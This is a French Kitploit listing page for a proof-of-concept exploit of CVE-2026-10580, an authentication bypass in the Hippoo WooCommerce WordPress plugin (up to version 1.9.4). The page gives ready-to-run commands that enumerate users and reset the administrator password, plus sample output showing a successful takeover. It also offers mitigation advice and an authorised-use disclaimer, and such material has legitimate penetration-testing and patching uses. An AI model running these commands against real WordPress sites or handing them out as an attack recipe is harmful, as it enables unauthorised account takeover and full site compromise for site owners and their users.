Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-10580 — Exploit PoC pour CVE-2026-10580 - Contournement d'authentification dans Hippoo Mobile App for WooCommerce <= 1.9.4 menant à une prise de contrôle du compte administrateur | Kitploit
Outils/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Authentification et AutorisationAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

Exploit PoC pour CVE-2026-10580 - Contournement d'authentification dans Hippoo Mobile App for WooCommerce <= 1.9.4 menant à une prise de contrôle du compte administrateur

Voir le dépôt
il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

WordPress

WordPress - Hippoo Mobile App pour WooCommerce <= 1.9.4 - Contournement d'authentification menant à la prise de contrôle du compte administrateur

License: MIT

Aperçu

Cet outil est un exploit de preuve de concept pour CVE-2026-10580, une vulnérabilité de contournement d'authentification affectant le plugin WordPress Hippoo Mobile App for WooCommerce (versions <= 1.9.4). Cette vulnérabilité permet à des attaquants non authentifiés de réinitialiser le mot de passe de n'importe quel utilisateur, y compris les administrateurs, conduisant à une prise de contrôle complète du site.

⚠️ Important : Cet outil est destiné uniquement à des tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée contre des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas d'autorisation explicite est illégale.

Fonctionnalités

  • Énumère tous les utilisateurs WordPress via le point de terminaison REST API vulnérable
  • Réinitialise le mot de passe pour un ID utilisateur spécifié (par défaut : ID admin 1)
  • Interface en ligne de commande simple avec sortie colorée
  • Option de désactivation de la vérification SSL pour les environnements de test

Utilisation

Prérequis

  • Python 3.6+
  • Bibliothèque requests

Installer les dépendances :

root@kitploit:~
pip install requests

Commande de base

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Options

Exemples

Exploitation avec l'ID admin par défaut (1) et vérification SSL :

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Cibler un ID utilisateur spécifique et désactiver la vérification SSL :

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Exécuter sans la bannière :

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Exemple de sortie

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

Atténuation

Si vous utilisez le plugin Hippoo, mettez-le à jour immédiatement vers une version corrigée (>1.9.4). De plus :

  • Auditez régulièrement les comptes utilisateur pour détecter les modifications non autorisées
  • Surveillez les journaux pour détecter les requêtes API inattendues vers /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Envisagez de restreindre l'accès à l'API REST WordPress si elle n'est pas nécessaire

Licence

Ce projet est sous licence MIT. Consultez le fichier LICENSE pour plus de détails.

Auteur

0xgh057r3c0n

Avertissement

L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Utilisez-le de manière responsable et uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation explicite de test.

Télécharger l’outil
ArgumentDescription
-t, --targetURL du site WordPress cible (ex : https://example.com)
-p, --passwordNouveau mot de passe à définir pour le compte administrateur
-i, --idID utilisateur à prendre en contrôle (par défaut : 1)
-k, --insecureIgnorer la vérification du certificat SSL
--no-bannerSupprimer la bannière ASCII